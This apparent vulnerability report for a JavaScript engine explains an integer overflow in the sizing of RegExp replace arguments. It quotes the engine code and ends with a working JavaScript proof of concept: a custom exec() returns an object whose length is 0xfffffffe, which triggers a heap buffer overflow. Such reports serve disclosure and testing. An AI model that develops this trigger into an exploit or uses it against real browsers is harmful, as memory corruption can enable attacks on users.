/*
Here's a snippet of the method.
ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
isolate, captures_length_obj,
Object::ToLength(isolate, captures_length_obj));
const int captures_length = PositiveNumberToUint32(*captures_length_obj);
...
if (functional_replace) {
const int argc =
has_named_captures ? captures_length + 3 : captures_length + 2; <<-- (a)
ScopedVector<Handle<Object>> argv(argc);
int cursor = 0;
for (int j = 0; j < captures_length; j++) {
argv[cursor++] = captures[j];
}
// (b)
argv[cursor++] = handle(Smi::FromInt(position), isolate);
argv[cursor++] = string;
The variable `captures_length` is user-controlled (it is derived, via `ToLength`, from the `length` of the object returned by a user-supplied `exec`), so the addition at (a) can overflow the `int` used for `argc`; `argv` is then allocated too small and the writes at (b) run past the end of it, i.e. a heap buffer overflow.
PoC:
*/
// Reproducer for the argv-sizing defect described in the comment above.
// A user-defined exec() is allowed to return any object, and the engine
// derives the capture count from that object's `length` via ToLength; a
// correct implementation must validate/clamp that coerced length before
// using it to size the argument vector.
let cnt = 0;
let reg = /./g;

// First call reports a match object whose `length` is close to 2^32;
// the second call resets the counter and ends the replace loop.
reg.exec = () => {
  const firstCall = cnt === 0;
  cnt = firstCall ? cnt + 1 : 0;
  return firstCall ? { length: 0xfffffffe } : null;
};

''.replace(reg, () => {});